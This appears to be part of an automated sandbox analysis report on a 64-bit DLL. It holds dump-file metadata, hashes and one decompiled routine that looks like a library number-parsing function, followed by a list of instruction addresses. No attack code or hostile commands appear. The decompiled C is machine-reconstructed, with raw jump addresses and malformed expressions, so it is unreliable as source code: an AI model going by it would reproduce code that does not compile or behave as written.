                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289030E3
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289030FF
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28903121
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28903196
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289031B2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289031D4
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289031DE
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289031FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 4284633421-0
                                                                                                        • Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction ID: 89953d27fe8e0a32316d62399db8fe5ae7e10c2067d1959a454b739d0a7558bd
                                                                                                        • Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction Fuzzy Hash: 0451D226A1CB9582DA50EB69E85136AA3A0FBC4791F105137EBCD43BAADF3DD041CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 40%
                                                                                                        			E00007FFC7FFC2890893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                        				void* _v64;
                                                                                                        				intOrPtr _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				intOrPtr _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				intOrPtr _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				intOrPtr _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				long long _v160;
                                                                                                        				long long _v168;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t155;
                                                                                                        				void* _t185;
                                                                                                        				signed short _t199;
                                                                                                        				signed short _t200;
                                                                                                        				signed int _t201;
                                                                                                        				signed int _t250;
                                                                                                        				signed int _t252;
                                                                                                        				signed int _t254;
                                                                                                        				signed int _t255;
                                                                                                        				signed int _t258;
                                                                                                        				signed int _t261;
                                                                                                        				signed short* _t380;
                                                                                                        				signed short* _t381;
                                                                                                        				signed short* _t382;
                                                                                                        				signed short* _t384;
                                                                                                        				signed short** _t385;
                                                                                                        				long long _t386;
                                                                                                        				long long* _t389;
                                                                                                        				signed short* _t390;
                                                                                                        				long long* _t394;
                                                                                                        				long long* _t395;
                                                                                                        				long long* _t396;
                                                                                                        				signed short** _t397;
                                                                                                        				void* _t398;
                                                                                                        				void* _t399;
                                                                                                        				signed short* _t404;
                                                                                                        				signed short* _t405;
                                                                                                        				long long _t406;
                                                                                                        				signed short* _t407;
                                                                                                        				long long _t408;
                                                                                                        				intOrPtr _t409;
                                                                                                        
                                                                                                        				_t403 = __r8;
                                                                                                        				_t394 = __rdx;
                                                                                                        				_t386 = __rbx;
                                                                                                        				_a24 = __rbx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t406 =  *((intOrPtr*)(__rdx));
                                                                                                        				r13d = 0;
                                                                                                        				_t255 = r9b & 0xffffffff;
                                                                                                        				r14d = r8d;
                                                                                                        				_v64 = _t406;
                                                                                                        				_t397 = __rdx;
                                                                                                        				if (_t406 != 0) goto 0x28908987;
                                                                                                        				E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = 0x16;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				goto 0x289089b9;
                                                                                                        				if (r14d == 0) goto 0x289089d1;
                                                                                                        				_t4 = _t403 - 2; // -2
                                                                                                        				if (_t4 - 0x22 <= 0) goto 0x289089d1;
                                                                                                        				_v160 = __rcx;
                                                                                                        				r9d = 0;
                                                                                                        				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *(__rcx + 0x2c) = 0x16;
                                                                                                        				_v168 = _t408;
                                                                                                        				E00007FFC7FFC28909674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                        				_t389 = _t397[1];
                                                                                                        				if (_t389 == 0) goto 0x2890901d;
                                                                                                        				 *_t389 =  *_t397;
                                                                                                        				goto 0x2890901d;
                                                                                                        				 *_t394 = _t406 + 2;
                                                                                                        				_t260 = r13d;
                                                                                                        				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x289089fb;
                                                                                                        				0x28909140();
                                                                                                        				goto 0x289089fb;
                                                                                                        				_t378 =  *_t397;
                                                                                                        				 *_t397 =  &(( *_t397)[1]);
                                                                                                        				if (E00007FFC7FFC2890B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x289089ee;
                                                                                                        				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
                                                                                                        				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x28908a32;
                                                                                                        				_t380 =  *_t397;
                                                                                                        				_t199 =  *_t380 & 0x0000ffff;
                                                                                                        				_t381 =  &(_t380[1]);
                                                                                                        				 *_t397 = _t381;
                                                                                                        				_a16 = 0xa70;
                                                                                                        				_v152 = 0xae6;
                                                                                                        				_v148 = 0xaf0;
                                                                                                        				_v144 = 0xb66;
                                                                                                        				r8d = 0x660;
                                                                                                        				_v140 = 0xb70;
                                                                                                        				_t20 = _t381 - 0x80; // 0x5e0
                                                                                                        				r9d = _t20;
                                                                                                        				_v136 = 0xc66;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				_v132 = 0xc70;
                                                                                                        				r11d = 0x966;
                                                                                                        				_v128 = 0xce6;
                                                                                                        				_v124 = 0xcf0;
                                                                                                        				_v120 = 0xd66;
                                                                                                        				_v116 = 0xd70;
                                                                                                        				_v112 = 0xe50;
                                                                                                        				_v108 = 0xe5a;
                                                                                                        				_v104 = 0xed0;
                                                                                                        				_v100 = 0xeda;
                                                                                                        				_v96 = 0xf20;
                                                                                                        				_v92 = 0xf2a;
                                                                                                        				_v88 = 0x1040;
                                                                                                        				_v84 = 0x104a;
                                                                                                        				_v80 = 0x17e0;
                                                                                                        				_v76 = 0x17ea;
                                                                                                        				_v72 = 0x1810;
                                                                                                        				_v68 = 0xff1a;
                                                                                                        				if ((r14d & 0xffffffef) != 0) goto 0x28908da0;
                                                                                                        				if (_t199 - 0x30 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x3a >= 0) goto 0x28908b3e;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - 0xff10 >= 0) goto 0x28908cdb;
                                                                                                        				if (_t199 - r8w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x66a >= 0) goto 0x28908b66;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - r10w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x6fa >= 0) goto 0x28908b85;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - r11w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x970 >= 0) goto 0x28908ba4;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - r9w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x9f0 >= 0) goto 0x28908bc3;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _a16 >= 0) goto 0x28908be3;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - _v152 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v148 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v144 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v140 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v136 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v132 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v128 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v124 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v120 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v116 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v112 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v108 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v104 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v100 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v96 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v92 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v88 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v84 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v80 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v76 < 0) goto 0x28908b34;
                                                                                                        				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x28908cef;
                                                                                                        				goto 0x28908b34;
                                                                                                        				if (_t199 - _v68 >= 0) goto 0x28908cef;
                                                                                                        				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x28908d11;
                                                                                                        				_t64 = _t389 - 0x41; // -17
                                                                                                        				_t65 = _t389 - 0x61; // -49
                                                                                                        				_t155 = _t65;
                                                                                                        				if (_t64 - 0x19 <= 0) goto 0x28908d06;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x28908d91;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x28908d0e;
                                                                                                        				_t66 = _t389 - 0x37; // -231
                                                                                                        				if (_t66 != 0) goto 0x28908d91;
                                                                                                        				_t390 =  *_t397;
                                                                                                        				r9d = 0xffdf;
                                                                                                        				_t250 =  *_t390 & 0x0000ffff;
                                                                                                        				_t67 =  &(_t390[1]); // 0xffe1
                                                                                                        				_t404 = _t67;
                                                                                                        				 *_t397 = _t404;
                                                                                                        				_t68 = _t394 - 0x58; // 0x698
                                                                                                        				if ((r9w & _t68) == 0) goto 0x28908d79;
                                                                                                        				 *_t397 = _t390;
                                                                                                        				_t159 =  !=  ? r14d : 8;
                                                                                                        				r14d =  !=  ? r14d : 8;
                                                                                                        				if (_t250 == 0) goto 0x28908d71;
                                                                                                        				if ( *_t390 == _t250) goto 0x28908d71;
                                                                                                        				E00007FFC7FFC2890B420(_t381);
                                                                                                        				 *_t381 = 0x16;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				r8d = 0x660;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				r11d = 0x966;
                                                                                                        				goto 0x28908da0;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x28908da0;
                                                                                                        				_t200 =  *_t404 & 0x0000ffff;
                                                                                                        				_t71 =  &(_t404[1]); // 0xffe3
                                                                                                        				_t382 = _t71;
                                                                                                        				 *_t397 = _t382;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x28908d96;
                                                                                                        				_t164 =  !=  ? r14d : 0xa;
                                                                                                        				r14d = 0xa;
                                                                                                        				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                                                        				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				r12d = 0x30;
                                                                                                        				r15d = 0xff10;
                                                                                                        				r9d = 0xa / r14d;
                                                                                                        				if (_t200 - r12w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x3a >= 0) goto 0x28908dd2;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - r15w >= 0) goto 0x28908f5b;
                                                                                                        				if (_t200 - r8w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x66a >= 0) goto 0x28908dfb;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - r10w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x6fa >= 0) goto 0x28908e1a;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - r11w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x970 >= 0) goto 0x28908e39;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - 0x9e6 < 0) goto 0x28908f70;
                                                                                                        				_t76 =  &(_t382[5]); // 0x9f0
                                                                                                        				if (_t200 - _t76 >= 0) goto 0x28908e59;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - 0xa66 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _a16 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v152 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v148 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v144 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v140 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v136 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v132 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v128 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v124 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v120 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v116 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v112 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v108 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v104 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v100 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v96 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v92 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v88 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v84 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v80 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v76 < 0) goto 0x28908e4f;
                                                                                                        				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x28908f70;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - _v68 >= 0) goto 0x28908f70;
                                                                                                        				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x28908f93;
                                                                                                        				_t100 = _t390 - 0x41; // -65
                                                                                                        				_t101 = _t390 - 0x61; // -97
                                                                                                        				_t185 = _t101;
                                                                                                        				if (_t100 - 0x19 <= 0) goto 0x28908f83;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x28908f90;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x28908f8b;
                                                                                                        				goto 0x28908f93;
                                                                                                        				_t405 =  *_t397;
                                                                                                        				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x28908fd7;
                                                                                                        				_t201 =  *_t405 & 0x0000ffff;
                                                                                                        				_t254 = _t382 + _t390;
                                                                                                        				_t261 = _t254;
                                                                                                        				_t107 =  &(_t405[1]); // 0x2
                                                                                                        				r8d = 0x660;
                                                                                                        				 *_t397 = _t107;
                                                                                                        				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                        				goto 0x28908db7;
                                                                                                        				_t409 = _a8;
                                                                                                        				_t109 = _t405 - 2; // -2
                                                                                                        				_t384 = _t109;
                                                                                                        				_t407 = _v64;
                                                                                                        				 *_t397 = _t384;
                                                                                                        				if (_t201 == 0) goto 0x28909008;
                                                                                                        				if ( *_t384 == _t201) goto 0x28909008;
                                                                                                        				E00007FFC7FFC2890B420(_t384);
                                                                                                        				 *_t384 = 0x16;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				if ((sil & 0x00000008) != 0) goto 0x28909024;
                                                                                                        				_t385 = _t397[1];
                                                                                                        				 *_t397 = _t407;
                                                                                                        				if (_t385 == 0) goto 0x2890901d;
                                                                                                        				 *_t385 = _t407;
                                                                                                        				goto 0x289090a8;
                                                                                                        				r8d = 0x80000000;
                                                                                                        				_t114 = _t405 - 1; // -1
                                                                                                        				r9d = _t114;
                                                                                                        				if ((sil & 0x00000004) != 0) goto 0x2890904c;
                                                                                                        				if ((sil & 0x00000001) == 0) goto 0x2890908f;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x28909047;
                                                                                                        				if (_t261 - r8d <= 0) goto 0x28909095;
                                                                                                        				goto 0x2890904c;
                                                                                                        				if (_t261 - r9d <= 0) goto 0x28909097;
                                                                                                        				 *((char*)(_t409 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
                                                                                                        				if ((_t258 & 0x00000001) != 0) goto 0x28909067;
                                                                                                        				goto 0x28909097;
                                                                                                        				_t395 = _t397[1];
                                                                                                        				if ((_t258 & 0x00000002) == 0) goto 0x2890907f;
                                                                                                        				if (_t395 == 0) goto 0x2890907a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x289090a8;
                                                                                                        				if (_t395 == 0) goto 0x2890908a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x289090a8;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x28909097;
                                                                                                        				_t396 = _t397[1];
                                                                                                        				if (_t396 == 0) goto 0x289090a6;
                                                                                                        				 *_t396 =  *_t397;
                                                                                                        				return  ~(_t261 | 0xffffffff);
                                                                                                        			}





























































                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc28908941
                                                                                                        0x7ffc28908958
                                                                                                        0x7ffc2890895b
                                                                                                        0x7ffc2890895e
                                                                                                        0x7ffc28908962
                                                                                                        0x7ffc28908965
                                                                                                        0x7ffc2890896d
                                                                                                        0x7ffc28908973
                                                                                                        0x7ffc28908975
                                                                                                        0x7ffc2890897a
                                                                                                        0x7ffc28908980
                                                                                                        0x7ffc28908985
                                                                                                        0x7ffc2890898a
                                                                                                        0x7ffc2890898c
                                                                                                        0x7ffc28908993
                                                                                                        0x7ffc28908995
                                                                                                        0x7ffc2890899a
                                                                                                        0x7ffc2890899d
                                                                                                        0x7ffc289089a1
                                                                                                        0x7ffc289089a4
                                                                                                        0x7ffc289089af
                                                                                                        0x7ffc289089b4
                                                                                                        0x7ffc289089b9
                                                                                                        0x7ffc289089c0
                                                                                                        0x7ffc289089c9
                                                                                                        0x7ffc289089cc
                                                                                                        0x7ffc289089db
                                                                                                        0x7ffc289089de
                                                                                                        0x7ffc289089e5
                                                                                                        0x7ffc289089e7
                                                                                                        0x7ffc289089ec
                                                                                                        0x7ffc289089ee
                                                                                                        0x7ffc289089f8
                                                                                                        0x7ffc28908a0a
                                                                                                        0x7ffc28908a1a
                                                                                                        0x7ffc28908a23
                                                                                                        0x7ffc28908a25
                                                                                                        0x7ffc28908a28
                                                                                                        0x7ffc28908a2b
                                                                                                        0x7ffc28908a2f
                                                                                                        0x7ffc28908a32
                                                                                                        0x7ffc28908a42
                                                                                                        0x7ffc28908a4f
                                                                                                        0x7ffc28908a5c
                                                                                                        0x7ffc28908a64
                                                                                                        0x7ffc28908a6a
                                                                                                        0x7ffc28908a72
                                                                                                        0x7ffc28908a72
                                                                                                        0x7ffc28908a76
                                                                                                        0x7ffc28908a7e
                                                                                                        0x7ffc28908a84
                                                                                                        0x7ffc28908a8c
                                                                                                        0x7ffc28908a92
                                                                                                        0x7ffc28908a9a
                                                                                                        0x7ffc28908aa2
                                                                                                        0x7ffc28908aaa
                                                                                                        0x7ffc28908ab2
                                                                                                        0x7ffc28908aba
                                                                                                        0x7ffc28908ac2
                                                                                                        0x7ffc28908aca
                                                                                                        0x7ffc28908ad2
                                                                                                        0x7ffc28908ada
                                                                                                        0x7ffc28908ae2
                                                                                                        0x7ffc28908aea
                                                                                                        0x7ffc28908af2
                                                                                                        0x7ffc28908afa
                                                                                                        0x7ffc28908b02
                                                                                                        0x7ffc28908b0d
                                                                                                        0x7ffc28908b1f
                                                                                                        0x7ffc28908b28
                                                                                                        0x7ffc28908b32
                                                                                                        0x7ffc28908b39
                                                                                                        0x7ffc28908b41
                                                                                                        0x7ffc28908b4b
                                                                                                        0x7ffc28908b59
                                                                                                        0x7ffc28908b61
                                                                                                        0x7ffc28908b6a
                                                                                                        0x7ffc28908b78
                                                                                                        0x7ffc28908b80
                                                                                                        0x7ffc28908b89
                                                                                                        0x7ffc28908b97
                                                                                                        0x7ffc28908b9f
                                                                                                        0x7ffc28908ba8
                                                                                                        0x7ffc28908bb6
                                                                                                        0x7ffc28908bbe
                                                                                                        0x7ffc28908bc6
                                                                                                        0x7ffc28908bd4
                                                                                                        0x7ffc28908bde
                                                                                                        0x7ffc28908bea
                                                                                                        0x7ffc28908bf5
                                                                                                        0x7ffc28908c02
                                                                                                        0x7ffc28908c0d
                                                                                                        0x7ffc28908c1a
                                                                                                        0x7ffc28908c25
                                                                                                        0x7ffc28908c32
                                                                                                        0x7ffc28908c3d
                                                                                                        0x7ffc28908c4a
                                                                                                        0x7ffc28908c55
                                                                                                        0x7ffc28908c62
                                                                                                        0x7ffc28908c6d
                                                                                                        0x7ffc28908c7a
                                                                                                        0x7ffc28908c81
                                                                                                        0x7ffc28908c8e
                                                                                                        0x7ffc28908c95
                                                                                                        0x7ffc28908ca2
                                                                                                        0x7ffc28908ca9
                                                                                                        0x7ffc28908cb6
                                                                                                        0x7ffc28908cbd
                                                                                                        0x7ffc28908cd4
                                                                                                        0x7ffc28908cd6
                                                                                                        0x7ffc28908ce3
                                                                                                        0x7ffc28908ced
                                                                                                        0x7ffc28908cf2
                                                                                                        0x7ffc28908cf8
                                                                                                        0x7ffc28908cf8
                                                                                                        0x7ffc28908cfb
                                                                                                        0x7ffc28908d00
                                                                                                        0x7ffc28908d09
                                                                                                        0x7ffc28908d0e
                                                                                                        0x7ffc28908d13
                                                                                                        0x7ffc28908d15
                                                                                                        0x7ffc28908d18
                                                                                                        0x7ffc28908d1e
                                                                                                        0x7ffc28908d21
                                                                                                        0x7ffc28908d21
                                                                                                        0x7ffc28908d25
                                                                                                        0x7ffc28908d28
                                                                                                        0x7ffc28908d2f
                                                                                                        0x7ffc28908d34
                                                                                                        0x7ffc28908d3c
                                                                                                        0x7ffc28908d40
                                                                                                        0x7ffc28908d46
                                                                                                        0x7ffc28908d4b
                                                                                                        0x7ffc28908d4d
                                                                                                        0x7ffc28908d52
                                                                                                        0x7ffc28908d58
                                                                                                        0x7ffc28908d5d
                                                                                                        0x7ffc28908d63
                                                                                                        0x7ffc28908d69
                                                                                                        0x7ffc28908d6f
                                                                                                        0x7ffc28908d71
                                                                                                        0x7ffc28908d77
                                                                                                        0x7ffc28908d79
                                                                                                        0x7ffc28908d7d
                                                                                                        0x7ffc28908d7d
                                                                                                        0x7ffc28908d81
                                                                                                        0x7ffc28908d84
                                                                                                        0x7ffc28908d8f
                                                                                                        0x7ffc28908d99
                                                                                                        0x7ffc28908d9d
                                                                                                        0x7ffc28908da2
                                                                                                        0x7ffc28908da5
                                                                                                        0x7ffc28908da5
                                                                                                        0x7ffc28908da8
                                                                                                        0x7ffc28908dae
                                                                                                        0x7ffc28908db4
                                                                                                        0x7ffc28908dbb
                                                                                                        0x7ffc28908dc5
                                                                                                        0x7ffc28908dcd
                                                                                                        0x7ffc28908dd6
                                                                                                        0x7ffc28908de0
                                                                                                        0x7ffc28908dee
                                                                                                        0x7ffc28908df6
                                                                                                        0x7ffc28908dff
                                                                                                        0x7ffc28908e0d
                                                                                                        0x7ffc28908e15
                                                                                                        0x7ffc28908e1e
                                                                                                        0x7ffc28908e2c
                                                                                                        0x7ffc28908e34
                                                                                                        0x7ffc28908e41
                                                                                                        0x7ffc28908e47
                                                                                                        0x7ffc28908e4d
                                                                                                        0x7ffc28908e54
                                                                                                        0x7ffc28908e61
                                                                                                        0x7ffc28908e6f
                                                                                                        0x7ffc28908e78
                                                                                                        0x7ffc28908e83
                                                                                                        0x7ffc28908e8c
                                                                                                        0x7ffc28908e97
                                                                                                        0x7ffc28908ea0
                                                                                                        0x7ffc28908eab
                                                                                                        0x7ffc28908eb4
                                                                                                        0x7ffc28908ebf
                                                                                                        0x7ffc28908ec8
                                                                                                        0x7ffc28908ed3
                                                                                                        0x7ffc28908ee0
                                                                                                        0x7ffc28908eeb
                                                                                                        0x7ffc28908ef8
                                                                                                        0x7ffc28908eff
                                                                                                        0x7ffc28908f0c
                                                                                                        0x7ffc28908f13
                                                                                                        0x7ffc28908f20
                                                                                                        0x7ffc28908f27
                                                                                                        0x7ffc28908f34
                                                                                                        0x7ffc28908f3b
                                                                                                        0x7ffc28908f52
                                                                                                        0x7ffc28908f59
                                                                                                        0x7ffc28908f63
                                                                                                        0x7ffc28908f6e
                                                                                                        0x7ffc28908f73
                                                                                                        0x7ffc28908f79
                                                                                                        0x7ffc28908f79
                                                                                                        0x7ffc28908f7c
                                                                                                        0x7ffc28908f81
                                                                                                        0x7ffc28908f86
                                                                                                        0x7ffc28908f8e
                                                                                                        0x7ffc28908f93
                                                                                                        0x7ffc28908f99
                                                                                                        0x7ffc28908f9b
                                                                                                        0x7ffc28908fa5
                                                                                                        0x7ffc28908fb6
                                                                                                        0x7ffc28908fbd
                                                                                                        0x7ffc28908fc4
                                                                                                        0x7ffc28908fcd
                                                                                                        0x7ffc28908fd0
                                                                                                        0x7ffc28908fd2
                                                                                                        0x7ffc28908fd7
                                                                                                        0x7ffc28908fdf
                                                                                                        0x7ffc28908fdf
                                                                                                        0x7ffc28908fe3
                                                                                                        0x7ffc28908feb
                                                                                                        0x7ffc28908ff1
                                                                                                        0x7ffc28908ff6
                                                                                                        0x7ffc28908ff8
                                                                                                        0x7ffc28908ffd
                                                                                                        0x7ffc28909003
                                                                                                        0x7ffc2890900c
                                                                                                        0x7ffc2890900e
                                                                                                        0x7ffc28909012
                                                                                                        0x7ffc28909018
                                                                                                        0x7ffc2890901a
                                                                                                        0x7ffc2890901f
                                                                                                        0x7ffc28909024
                                                                                                        0x7ffc2890902a
                                                                                                        0x7ffc2890902a
                                                                                                        0x7ffc28909032
                                                                                                        0x7ffc28909038
                                                                                                        0x7ffc2890903e
                                                                                                        0x7ffc28909043
                                                                                                        0x7ffc28909045
                                                                                                        0x7ffc2890904a
                                                                                                        0x7ffc2890904e
                                                                                                        0x7ffc28909056
                                                                                                        0x7ffc28909060
                                                                                                        0x7ffc28909065
                                                                                                        0x7ffc28909067
                                                                                                        0x7ffc2890906d
                                                                                                        0x7ffc28909072
                                                                                                        0x7ffc28909077
                                                                                                        0x7ffc2890907d
                                                                                                        0x7ffc28909082
                                                                                                        0x7ffc28909087
                                                                                                        0x7ffc2890908d
                                                                                                        0x7ffc28909093
                                                                                                        0x7ffc28909097
                                                                                                        0x7ffc2890909e
                                                                                                        0x7ffc289090a3
                                                                                                        0x7ffc289090c2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
